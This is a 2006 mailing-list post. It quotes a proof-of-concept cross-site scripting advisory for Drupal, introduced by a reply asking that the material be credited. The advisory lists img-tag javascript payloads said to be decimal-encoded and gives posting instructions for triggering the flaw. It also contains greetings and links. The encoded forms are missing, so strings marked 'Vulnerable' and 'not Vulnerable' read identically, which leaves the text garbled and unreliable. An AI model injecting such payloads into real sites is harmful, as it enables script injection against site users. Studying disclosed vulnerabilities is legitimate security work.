Hi, it would be nice if you could give me some props next time,
as this code is pulled straight from my site. I don't mind if you
re-use it, but just plain ripping code from my site isn't super cool.
On Mon, 2 Jan 2006 [EMAIL PROTECTED] wrote:
Drupal all versiyon xss
----------------------------------------------------
site:http://www.drupal.org
Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
--------------------------------------------------
img tag : on
---------------------------------------------------------------------------------------------------------------------------------------------------------------------
Decimal Value: HTML (without semicolons)
<img src=javascript:alert('XSS')> = <img
src=javascript:alert('XSS')>
---------------------------------------------------------------------------------------------------------------------------------------------------------------
Decimal Value: HTML (with semicolons)
<img src=javascript:alert('XSS')> = <img
src=javascript:alert('XSS')>
---------------------------------------------------------------------------------------------------------------------------------------------------------------
example:
post message :<img src=javascript:alert('XSS')> not Vulnerable but <img
src=javascript:alert('XSS')>
Vulnerable
post mesage :<img src=javascript:alert('XSS')> not Vulnerable but <img
src=javascript:alert('XSS')>
Vulnerable
---------------------------------------------------------
Credit:Liz0ziM
mail:[EMAIL PROTECTED]
www.biyo.tk , www.cehennem.org
Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyberlord
and all friend
-----------------------------------------------------------
Source:
http://liz0zim.no-ip.org/drupal.txt
------------------------------------------------------------
-R
